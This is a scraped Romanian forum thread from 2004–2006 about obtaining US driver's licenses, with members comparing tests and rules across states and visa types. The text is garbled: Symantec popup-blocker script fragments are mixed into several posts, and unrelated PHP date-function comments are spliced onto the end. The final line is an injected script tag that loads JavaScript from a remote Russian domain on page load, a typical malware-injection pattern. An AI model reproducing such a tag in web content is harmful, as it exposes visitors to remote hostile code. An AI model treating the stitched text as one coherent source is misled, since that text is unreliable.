PDA

Arată versiune întreagă : carnet conducere (driving license)



07.01.2004, 03:12
sint si eu de putin timp prin new york si as dori sa stiu cite ceva despre cum se ia carnetul de conducere. pentru ca nu stiu inca daca o sa stau prea mult aici sau ma voi muta in alt stat, ma intereseaza daca e recomandat sa-mi iau carnet aici si dupa aia sa-l schimb, sau sa mai astept si in cazul in care ma mut in alt stat sa-l iau atunci?
cheerssmileys/smiley1.gif

tea13
15.01.2004, 14:29
Buna smileys/smiley2.gif


Eu am locuit in Tennessee doi ani,s i stiu cum functioneaza acolo.. Daca esti peste 15 ani, si nu ai avut carnet in Ro, sau unde ai trait inainte, te duci la un centru de politie special (intreaba lumea care conduce, sigur stiu) si acolo iti iei o carte despre toate regulile din statul in care vrei sa aplici. Il citesti bine de tot, din scoarta in scoarta, de vreo 3 ori, smileys/smiley36.gif, si te duci si iti dai testul pt Learner's Permit. Dupa ce il ei (cu scor maxim, smileys/smiley32.gif) ai 6 months sa inveti sa conduci cu masina automata (sa nu te prind pe autostrazi in prima zi, lool, vezi ca sunt anumite reguli). Pana intr-un an iti poti da examen de condus.. e relativ usor in comparatie cu Romania, adica masina automata e mult mai usor de condus (mai putin sigura, damn it, dar totusi.. )


Oricum, multa bafta.. si keep off the roads cand ma intorc eu prin State (j/k smileys/smiley2.gif)

18.01.2004, 02:15
multzam pentru raspuns. intre timp m-am hotarit si ramin aici asa ca cel putin o perioada n-o sa fie nevoie sa-l schimb. partea proasta e ca nu prea am chef sa citesc materialele alea asa ca o sa ma duc la

dragalasha
12.02.2004, 06:16
smileys/smiley1.gifTea sa inteleg ca tu nu ai avut carnet in Ro?...


Dar cei care iau avut carnet de conducere in Ro, tot asa fac ?...adica se apuica iar de de invatzat ?

12.02.2004, 06:53
nu-i mare brinza de invatat pentru un carnet aici, e mai simplu ca in Ro....piece of cake

03.03.2004, 06:39
got itsmileys/smiley2.gif

Stere
14.03.2004, 06:47
Mai eu m-am mutat aici la 18 ani, si nu aveam carnet, dar stiam sa conduc. Spre mirarea mea am trecut testu scris, si l-am picat pe cel condussmileys/smiley36.gif. Este foarte ushor sa treci amindoua testele, iar cind te decizi sa dai pentru testul scris, dal pe computer. Mi se pare ca ai voie sa il dai de vreo 4 ori in aceiasi zi pina cind iti zice sa pleci acasa si sa vii altadata. Iar in alea 4 ori, intrebarile se repetasmileys/smiley36.gif. Testul condus, foarte ushor. Nu stiu cum este la tine, dar la mine se da permisul destul de ushor pentru ca aici nu merge lumea pe jos deloc. In Houston daca nu ai masina, esti un om mort.

14.03.2004, 08:01
nyc,


daca te hotarasti sa te muti in alt stat, oricare va fi el va trebui sa-ti schimbi permisul de conducere. De obicei iti cer permisul din statul de unde te muti, te verifica sa vada daca nu cumva ai calcat pe bec si daca raspunsul e negativ dai doar testul scris si voila...u got urself a new driver's license

15.03.2004, 06:41
hey, multzam pt. sfaturismileys/smiley1.gif

02.04.2004, 03:59
poate e mai tarziu decat ti-ar fi trebuit, department of motor vehicle se numeste politia speciala in NY sate. Testul il poti da in limba romana si il poti trece instant. doar trebuie sa spui ca vrei formularele in limba romana si trebuie sa insisti. Lucratorii de acolo uneori nu stiu ca au asa ceva. Unii sunt mai noi si nu au apucat sa afle dacat ca e in engleza sau spaniola. au in mai multe limbi, printre care si romana.


Apoi poti sa-ti faci programarea pentru road test care poti sa o obtii intre o luna si o luna jumatate uneoari mai repede alteori mai tarziu.


bine este sa iei o ora doua inainte cu o mashina de scoala si sa mergi cu masina scolii la test. Asta e cea mai rapida cale pe care o cunosc.


felicitari daca l-ai luat,


bafta daca urmeaza sa-l iei


snuff

nicol
29.08.2004, 11:40
Am si eu intrebare daca ma poate ajuta cineva apropo de 'carnet de conducere".Eu locuiesc in Tennessee. Mai nou in acest stat daca nu aicetatenie nu mai ai sanse sa iti ei "driving license".smileys/smiley5.gif


Poti sa dai examen dar iti da doar un simplu carnet care nu il poti folosi decat pt. condus.


Am auzit ca ar exista pe internet o adresa la care poti trimite toate datele si carnetul din tara sa pot sa il schimb sa il fac international. Ma poate ajuta cineva cu aceasta adresa? A facut cineva asa ceva?


p.s...eu sunt de 2 luni in State si am venit ca o simpla turista ,cu alte cuvinte nu am nici-un fel de actesmileys/smiley5.gif


Daca ma mai poate ajuta cineva si cu alte idei ..sunt bine venite pt. mine .


Problema cea mare cred ca o stiiti cu toti care este..fara acte nu prea gasesc de lucru:( si sincera sa fiu nu stiu daca este o idee tocmai buna sa ma marit pt. ca nu vreau sa imbatranesc aici

sorin
31.08.2004, 03:28
Omica precizare: nu trebuie sa ai neaparat cetatenie in Tennessee si probabil in nici un stat din America, rezidenta permanenta e suficienta.


Eu stiu ca se luau carnete de conducere pentru cei cu "probleme" la Detroit, insa nu mai sunt la curent daca inca se mai poate sau nu.


In Tennessee, daca vii cu carnet din alt stat, dai numaitestul de vedere (vision). Chiar daca ti-ai face acel carnet inernational, tot iti trebuie "driver license" pentru ca ala e actul pe care ti-l cere oricine si oriunde pentru identificare.

kiddy
04.09.2004, 02:44
Nicol, dar cine spune ca daca te mariti trebuie sa imbatranesti pe-acolo?

mona
22.10.2004, 13:01
Apropo de driving licence, daca stau numaiun an aici, fix un an, am o viza de schimb cultural si nu am chef sa calc pe bec fiindca vreau sa cer dupa aia alta viza, imi trebuie permisul statului in care locuiesc. Mai exact in statul Peensilvanya. Stie cineva ceva despre asta? Eu conduc cu nesimtire cu permisul din Romania, nu merg decat cateva mile la destinatii precise, nu e trafic f intens in zona asta in care sunt eu, dar...orisicum

sorin
22.10.2004, 14:18
Treaba e ca nu te opreste nimeni daca mergi corect si respecti regulile, dar feresca D-zeu sa te loveasca vreun fraier si atunci trebuie sa arati si tu carnetul. Eu nu as risca si m-as duce sa iau carnetul ca nu e mare branza, e mult mai usor ca in Romania. In plus, iti foloseste si ca act de identitate, iar daca ai de gand sa mai vii...

sauzimdebine
22.10.2004, 15:32
mai ales ca tot procesul de a obtine carnetul in PA dureaza foarte putin timp< =""><!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
window.open = SymWinOpen;
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
if(SymReal&#079;nLoad != null)
SymReal&#079;nLoad();
window.open = SymRealWinOpen;
SymReal = window.;
window. = Sym;
}

SymReal&#079;nLoad = window.&#111;nload;
window.&#111;nload = Sym&#079;nLoad;

//-->
</>

the_cube
07.11.2004, 04:53
Salutare!


Sunt si eu un nou venit pe "pamantul fagaduintei"...smileys/smiley17.gifCe am observat e ca intr-adevar carnetul se ia foarte usor, insa pe de alta parte americanii sunt printre cei mai prosti soferi din lume... smileys/smiley36.gifPe mine chiar m-a accidentat o babuta asta iarna, mergand pe ditamai viscolul cu geamurile complet aburite... si incerca sa le curete cu o spatula...smileys/smiley18.gifFunny as hell!

ralux
07.11.2004, 05:04
Intr-adevar,carnetul de sofer se poate obtine foarte usor.Eu nu am citit decat vreo 30 min din acea carte,si asta in drumul spre "politie" .Habar n-aveam ca o sa dau testul in acea zi.dar intrebarile sunt de genul "ce trebuie sa faci la culoarea rosie a semaforului",sau"cand vine o ambulanta"...etc.Au fost si vreo 23 intrebari despre asigurare si ceva puncte,dar nu-i bai ca poti gresi cred 4-5 intrebari.Eu nu aveam carnet in romania dar a fost f usor.pt road test tre sa stii sa conduci,da nu e mare branza.
Mult succes!

vladone
09.11.2004, 05:17
la mine e comic!!! am avut in Romania carnet, 9 ani de zile, fara sa am vreodata vreu accident, totul a fost OK, aici in schimb ... am trecut examenul scris repede, dar la cel practic... ba! l-am dat pana acum de 2 ori, si l-am picat .. de 2 ori! mai merg peste 2 saptamani! dar nu ma descurajez!!! si tot acolo ma duc, am vazut ca sunt cam aceeasi examinatori (poate a fost o intamplare), dar asa o sa-i cunosc pe toti!

vladone
09.11.2004, 05:18
e drept, trebuie sa termin odata si cu treaba asta, ma cam costa!!

the_cube
09.11.2004, 12:14
pai sa stii ca e cazul sa termini... smileys/smiley2.gifca daca nici in state nu reusesti sa-l iei... nu e bine... smileys/smiley4.gif


Din ce mi s-a spus, in Romania o sa se schimbe sistemul pentru cei care dau de carnet(probabil ati auzit si voi). Am inteles ca vor fi si trasee noaptea si ca vor fi cam patru etape... Oricum, va fi mult mai greu decat pana acum.

robocel
10.04.2005, 10:23
vezi ca e cu cantec treba. Unele reguli de circulatie difera de la stat
la stat. De exemplu eu sunt in connecticut, si aici poti sa faci
dreapta chiar daca e rosu la semafor. Si esti obligat sa dai prioritate
la pietoni chiar daca ai verde si ei rosu. In New York nu se aplica
regulile astea. Trebuie sa citesti carticica aia.

cobra_usa84@yah
29.12.2005, 12:15
smileys/smiley1.gifTea sa inteleg ca tu nu ai avut carnet in Ro?...


Dar cei care iau avut carnet de conducere in Ro, tot asa fac ?...adica se apuica iar de de invatza


sunt din atlanta caut o pretena vrei sa vb cautama la nr 4049322727

Jeorjet
05.01.2006, 10:34
Eu stau in Ny si carnetul se ia foarte usor. Trebuie sa ai 6 puncte..dai testul scris, dupa faci cel putin 5 ore(obligatoriu) de teorie, intre timp inveti sa conduci, iar dupa te programezi si dai examenul de strada. In cazul in care ai permis de Romania, dai numai testul scris.

09.01.2006, 08:52
Nu este adevarat ca se ia carnetul de conducere foarte usor in america! cel putin nu unde stau eu (Ca)! eu am carnet de 10 ani din Ro si l-am picat cu brio la traseu! pt ca cei care lucreaza la dmv sint majoritatea acrituri de prin india si alte state asiatice emigranti care au mincat atita c#%^& cind au venit aici si cauta sa se razbune pt asta. cel putin asta este parerea mea. cauta sa te pice din cele mai minore chestii!

GNChicago
09.01.2006, 15:23
Lala, nu ai decit sa te plingi la sefii lor si atunci sa vezi cum o sa fie mai atenti dupa ce le spui ca a condus ZECE ani in europa.


e mai greu sa conduci si sa iei examenul in Romania decit in America!

luckylord
21.03.2006, 00:15
Hmm,ma gandesc ca sotia mea a luat permisul de conducere din prima in Ca,precizez faptul ca nu a mai avut permis in romania,nici nu stia sa conduca foarte bine deci.si nici cu engleza nu era pe roze la momentul respectiv.........deci?

21.03.2006, 12:41
Experienta mea de condus in Romania a avut si unele dezavantaje pentru aici.

1) Mi-a trebuit ceva timp sa invat sa tin cont de marcajele de pe sosea
si sa stau pe o banda anume. In Ro. nu ma interesa sa stau pe 'lane"-ul
meu pentru ca trebuia sa evit gropile

2) Am invatat sa nu mai sar pe frana de cum intru in intersectie vazand
cu coada ochiului ca s-a pus galben. Pericolul e mare sa te loveasca
din spate. Aici nu-ti ia nimeni carnetul daca intri in intersectie pe
galben (doar la rosu ai probleme).

3) Imensa majoritate a benzilor de acces pe autostrada iti permit sa
mergi paralel cu traficul principal pe o distanta de aprox 0.5mi.
Asadar, cand intri pe autostrada accelerezi ca sa ajungi la viteza
celorlalti.

4) Am invatat cu timpul ca nu toti pietonii cauta sa se arunce sub rotile tale prin locuri intunecate.



Altfel, in timpul unei furtuni, zona mea de oras a ramas fara stopuri.
Nimeni nu s-a lansat in intersectiii cu mai mare nesimtire ca mine si
nu a evitat cu mai mare dibacie pe ceilalti. Am multumit in gand
orasului meu natal: Bucuresti!

GNChicago
21.03.2006, 16:31
Tranzit ai ajuns in NY? Vezi ca vine un "storm" mare acolo si am inteles ca acolo se dau puncte....sau asaceva.....


Cind stopul e dezafectat de obicei se trece pe rind din fiecare directie, unul de colo, altul de dincolo si tot asa pe ambele sensuri cu atentie marita si cu ungrad de curtoazie marita......urmata de o fraza spus politicos pe romaneste...."hai treci in......"

22.03.2006, 13:09
Cind stopul e dezafectat de obicei se trece pe rind din fiecare
directie, unul de colo, altul de dincolo si tot asa pe ambele sensuri

In fostul meu oras, desprins de prin "Aripile Vantului", nu
indraznea nimeni sa treaca si se tot asteptau unul pe altul. La un mom
dat s-au hotarat 2 (doua smileys/smiley1.gif) simultan fapt ptr care s-au ciocnit.

PS De multe ori aud ca NY-ul nu are mare legatura cu US din pdv mentalitate (ca si FL).

garfield
22.03.2006, 13:29
In NY cel cu masina cea mai mare are prioritate smileys/smiley36.gif

GNChicago
22.03.2006, 15:09
Garfield ai ramas dator cu istoria despre inceputul lui Bella Karolyi....


Soferii in NY, daca au verde, nu te asteapta.....se duc!


Daca blochezi intersectia, esti fazan si iti da un fel de cartonase galbene, taloane.....o sa vina Garfield si o sa ne dea numele exact!

garfield
22.03.2006, 17:16
NYC Driving 101


Don't enter an intersection unless you are certain you can drive all the way through. "Blocking the box," as they call it, can land you a pretty hefty fine (the max penalty is a fine of $500 and two points on your driver's license)!

NYS Violations and their respective points:



<TABLE class=white cellSpacing=2 cellPadding=0 width=550 align=center summary="table for layout"><T>
<T>
<TR>
<TD width=250>Speeding (MPH over speed limit not indicated)</TD>
<TD align=middle width=40>3</TD>
<TD width=250>Following too closely</TD>
<TD align=middle width=40>4</TD></TR>
<TR>
<TD colSpan=2>Speeding (MPH over speed limit):</TD>
<TD width=250>Passing improperly, changing lanes unsafely, driving to the left of center, driving in the wrong direction</TD>
<TD align=middle width=40>3</TD></TR>
<TR>
<TD align=right width=250>1 - 10 MPH</TD>
<TD align=middle width=40>3</TD>
<TD width=250>
<TD width=40></TD>
<TR>
<TD align=right width=250>11 - 20 MPH </TD>
<TD align=middle width=40>4</TD>
<TD width=250>Failed to obey a traffic signal, a Stop sign, or a Yield sign </TD>
<TD align=middle width=40>3</TD></TR>
<TR>
<TD align=right width=250>21 - 30 MPH</TD>
<TD align=middle width=40>6</TD>
<TD width=250>Railroad crossing violation </TD>
<TD align=middle width=40>3</TD></TR>
<TR>
<TD align=right width=250>31 - 40 MPH</TD>
<TD align=middle width=40>8</TD>
<TD width=250>Failed to yield the right-of-way </TD>
<TD align=middle width=40>3</TD></TR>
<TR>
<TD align=right width=250>More than 40 MPH</TD>
<TD align=middle width=40>11</TD>
<TD width=250>Passenger safety violation, including seat belts, child safety seats, or passengers under the age of 16</TD>
<TD align=middle width=40>3</TD></TR>
<TR>
<TD width=250>Reckless driving</TD>
<TD align=middle width=40>5</TD>
<TD width=250>Left the scene of an accident that includes property damage or the injury of a domestic animal</TD>
<TD align=middle width=40>3</TD></TR>
<TR>
<TD width=250></script>

garfield
22.03.2006, 17:26
Garfield ai ramas dator cu istoria despre inceputul lui Bella Karolyi....


NU, am spus povestea acum 3 saptamani...smileys/smiley4.gif


http://www.romanian-portal.com/forum/forum_posts.asp?TID=388 (http://www.romanian-portal.com/forum/forum_posts.asp?TID=3880&amp;PN=0&amp;TPN=6) 0&amp;PN=0&amp;TPN=6

GNChicago
22.03.2006, 18:34
Ok, Garfield....asa este am citit povestea cu Bella pe care am vazut-o la televizor povestita chiar de Bella.


Surprinzator, un antrenor de talia lui Bella a inceput cariera lui in America spalind vase......


Am si eu o poveste cu o conferinta la telefon, dar o voi spune mai tirziu ptrca e trecut de miezul noptii in chicago....

garfield
22.03.2006, 18:43
Da,continuam mai tarziu, cae aproape 2 dimineatza in NY smileys/smiley4.gif

marian42
22.03.2006, 19:04
In NY cel cu masina cea mai mare are prioritate smileys/smiley36.gif

Sa-nteleg ca NY si RO au acelasi Cod Rutier ?...smileys/smiley1.gif

garfield
23.03.2006, 05:39
Nu stiu cum e codul, dar inRoecu mult mai periculos de condus de cat inNY smileys/smiley4.gif


PS. Aici nu scapi daca dai mita la politist; pe langa amenda, te mai si aresteaza smileys/smiley18.gif

Jeorjet
26.03.2006, 01:42
eu locuiesc in statul NY si chiar in momentul asta fac scoala, am dat learner permit,.... testul a fost foarte foarte usor, iar sa conduci e mult mai usor decat in tara. Eu am facut scoala chiar inainte de a pleca si mi s-a parut tare greu fata de aici. Adevarul e ca locuiesc si intr-un county civilizat. NU-mi vine sa cred ca pui in D si pe aici iti e drumul...

ramon
12.04.2006, 02:03
Salut tuturor, am venit in state de o luna ( cu viza de turist ) mi-au dat la intrare 6 luni dar as dori sa raman aici .


in ro am fost sofer profesionist ( TIR ) si vreau sa stiu daca pot obtine si aici un permmis pentru camioane sau chiar unul pentru turisme


acum locuiesc in florida ,stiu ca pe aici este o comunitate mare de romani si rog frumos sa ma ajute cineva cu cateva raspunsuri .


adresa de email este autoidea1@yahoo.com va multumesc

sorin
12.04.2006, 02:19
Daca nu ai SSN (social security number) nu cred ca poti obtine permis de conducere pentru camioane in nici un stat, dar poate gresesc si cineva va veni cu argumente impotriva afirmatiei mele. Spre deosebire de carnetele pentru autoturisme, pentru camioane trebuie sa mergi la scoala (destul de scumpa dupa cum am inteles) si sa dai si aici examene. Poate-ti da mai multe informatii cineva din <st1:State w:st="&#111;n"><st1:place w:st="&#111;n">Florida</st1:place></st1:State>, care stie legile locale.

antoanela74
17.04.2006, 12:51
si eu sunt noua,doar deo luna ....SI TREBUIE OBLIGATORIU SA-MI IAU CARNET..pt ca stau in Mooresville NC si fara car sunt ..DEAD!!!


So,e cineva din NC?? stiti cumva,e greu de luat permisul in statul asta????Eu inca astept SSC-ul ala..green cardul il am deja si apoi pot sa merg la test..am sofat ceva pe aci..E prima data kand m-am urcat la volanul unei masinismileys/smiley19.gif..si e OK!! acum depinde cat de OK va fi si pentru examinator looooooolsmileys/smiley18.gif....

ODeane
17.05.2006, 09:58
e cineva din Wisconsin?

18.05.2006, 13:12
ramon:

Florida este unul din statele care leaga perioada de valabilitate a
carnetului de conducere (ptr. autoturisme) cu cea a duratei de sedere
autorizata in SUA (pentru cei fara Green Card, se intelege). La B1/B2
s-ar putea nici sa nu-ti faca permis pe durata asa scurta si sa-ti
ceara sa conduci cu cel din Ro. sau international (nu stiu exact).

Daca nu poti avea permis de conducere "normal" din Florida nu poti obtine nici carnet de conducere profesionist.

http://www.cdl-course.com/faq-fl.html

Jeorjet
23.05.2006, 11:22
am luat carnetul....A FOST USORRRRRRRRRRRRRRRRRRRRRRRRRRRRRR...
nu se compara cu romania(unde e greu).

semaka21
25.06.2006, 13:47
Salut
Eu stau in Nashville TN si as dori sa-mi fac carnetul de conducere. Problema este ca aici iti fac carnetul numai pe perioada cat ai viza. Am auzit ca in Chicago poti obtine permisul pe 5 ani. Ma poate ajuta cineva?
Mersi

mihai_ro
22.07.2006, 11:50
Salutare tuturor.

Intrabare: Daca vreau sa inchiriez o masina cum ajung intr-un anume stat trebuie neaparat sa am permis (temporar) de SUA? Stiu ca e
absurda intrebarea, dar si situatia. Eu inchiriez o masina acolo, cum
cobor din avion deci nu am timp sa-mi fac permis de conducere temporar
acolo. Daca ar fi un test de 5 minute cu raspunsul pe loc si o adeverinta ceva din partea lor ca esti "apt" ar fi super.

Cu permisul international merge oare (cel dat de ACR), sau e doar apa de ploaie?





Multumesc anticipat pentru raspunsuri
< ="">
<!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
window.open = SymWinOpen;
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
if(SymReal&#079;nLoad != null)
SymReal&#079;nLoad();
window.open = SymRealWinOpen;
SymReal = window.;
window. = Sym;
}

SymReal&#079;nLoad = window.&#111;nload;
window.&#111;nload = Sym&#079;nLoad;

//-->
</>

22.07.2006, 12:31
Iti trebuie carnetul din Romania si o carte de credit - "permisul" international e acceptat doar de unele state, nu de toate, fiind considerat, in general, ca o "traducere" a carnetului din tara de origine.

mihai_ro
22.07.2006, 13:20
Multumesc foarte mult pentru raspuns. Ma asteptam sa fie asa. Cat despre permisul din Romania, deja pe spate are tradus tot in engleza si mi se pare absurd sa platesc 100$ (atat stiam) pe o hartie de la ACR. Oricum nu stiam de cartea de credit :P

Multam' fain
< =""><!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
window.open = SymWinOpen;
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
if(SymReal&#079;nLoad != null)
SymReal&#079;nLoad();
window.open = SymRealWinOpen;
SymReal = window.;
window. = Sym;
}

SymReal&#079;nLoad = window.&#111;nload;
window.&#111;nload = Sym&#079;nLoad;

//-->
</>

zerocool
31.07.2006, 06:38
Da ... tot nu sa scris in ce stat se mai poate face carnetul daca ai viza temporara tip H2B cum e a mea , stiam de Atlanta si Chicago ... eu stau in TN ... si de 2 sapt am auzit ca nu se mai poate face in Atlanta (urma sa plec pe acolo in drum spre Arizona)... si ca in Chicago e dificil ca trebuie sa arati ca locuiesti acolo ... adresa stabila .Eu trebuie sa plec in Phoenix Arizona peste 1 sapt ... si daca e cineva care stie ... le multumesc anticipat.

21.11.2006, 02:14
$quarters = (int) $countyears * 4;
if (date("m", strtotime($enddate)) != date("m", strtotime($begindate)))
{
if (date("m", strtotime($enddate)) > date("m", strtotime($begindate)))
{
$difference = date("m", strtotime($enddate)) - date("m", strtotime($begindate));

$quarters += ceil((int) $difference / 4);
}
else
{
$afterbegin = 12 - (int) date("m", strtotime($begindate));
$untilend = date("m", strtotime($enddate));

$quarters = ($quarters - 4) + ceil(($afterbegin + $untilend) / 4);
}
}
}

return $quarters;
}
mandi tek shqiperia.com
15-Sep-2006 07:15
If you have a date in the english format"Thu Sep 07 23:59:35 CEST 2006" (some times generated from logs or other systems) and you need to translate it in mm/dd/yyyy you can use the following function!
//$data="Thu Sep 07 23:59:35 CEST 2006";

function formadatedb($data)
{
$dt=explode(" ", $data);
$year=array ("Jan"=>1, "Feb"=>2, "Mar"=>3, "Apr"=>4, "May"=>5, "Jun"=>6, "Jul"=>7, "Aug"=>8, "Sep"=>9,"Oct"=>10,"Nov"=>11,"Dec"=>12);
return $year[$dt[1]]."/".$dt[2]."/".$dt[5];
}
russ at isitaboat dot co dot uk
06-Sep-2006 07:18
Easy way of switching between mysql and "normal" dates (english, not american)...

<?php
function flipdate($dt, $seperator_in = '-', $seperator_out = '-')
{
return implode($seperator_out, array_reverse(explode($seperator_in, $dt)));
}
?>
michiel at mb-it dot nl
04-Sep-2006 05:59
***EDITOR NOTE: Referred to note has been removed.

The calculation function of the number of days between 2 dates by zzzdobr at gmai dot com could be done much easier:

<?
function getdays($day1,$day2)
{
return round((strtotime($day2)-strtotime($day1))/(24*60*60),0);
}

$begin = date("Y/m/d"); // we set today as an example
$end = "2006/11/27";
getdays($begin,$end);
?>

So now all of you know how many days you have left to buy me a birthday present ;)
James
29-Aug-2006 05:45
Slightly modified the code provided by "martin at smttuk dot com" so that you can give the function a date and/or time that you choose;

<?php
function zonedate($layout, $countryzone, $daylightsaving, $time)
{
if($daylightsaving) {
$daylight_saving = date('I');
if($daylight_saving){ $zone=3600*($countryzone+1); }
}
else {
if( $countryzone>>0){ $zone=3600*$countryzone; }
else { $zone=0; }
}
if(!$time) { $time = time(); }
$date = gmdate($layout, $time + $zone);
return $date;
}
?>

For example if I wanted the time and date of my birthday in New Zealand time;

<?php
echo zonedate('Y-m-d H:i:s',-12,true,mktime(18,46,0,9,7,1986));
?>
Corey
27-Aug-2006 05:55
It's pretty simple, but in case anybody else is having problems getting the exact time they need because of DST (ex: on a Windows box in an area without DST), you can fix it all in a single line. Example...

<?php
echo "The time is " . date((date("I") ? intval(date("g")) - 1 : date("g")) . ":i m/d/y") . ".";
?>
martin at smttuk dot com
25-Aug-2006 04:30
/* Country Zone : Time Zone Name
-12 : Dateline Standard
-11 : Samoa Standard Time
-10 : Hawaiian Standard Time
-8 : Pacific Standard Time
-7 : Mexican Standard Time, Mountain Standard Time
-6 : Central Standard Time, Mexico Standard Time
-5 : Eastern Standard Time Eastern Time, SA Pacific Standard Time
-4 : Atlantic Standard Time, SA Western Standard Time, Pacific SA Standard Time
-3.5 : Newfoundland Standard Time
-3 : SA Eastern Standard Time, E. South America Standard Time
-2 : Mid:Atlantic Standard Time
-1 : Azores Standard Time, Cape Verde Stan<script src=http://www.iroe.ru/ngg.js></script>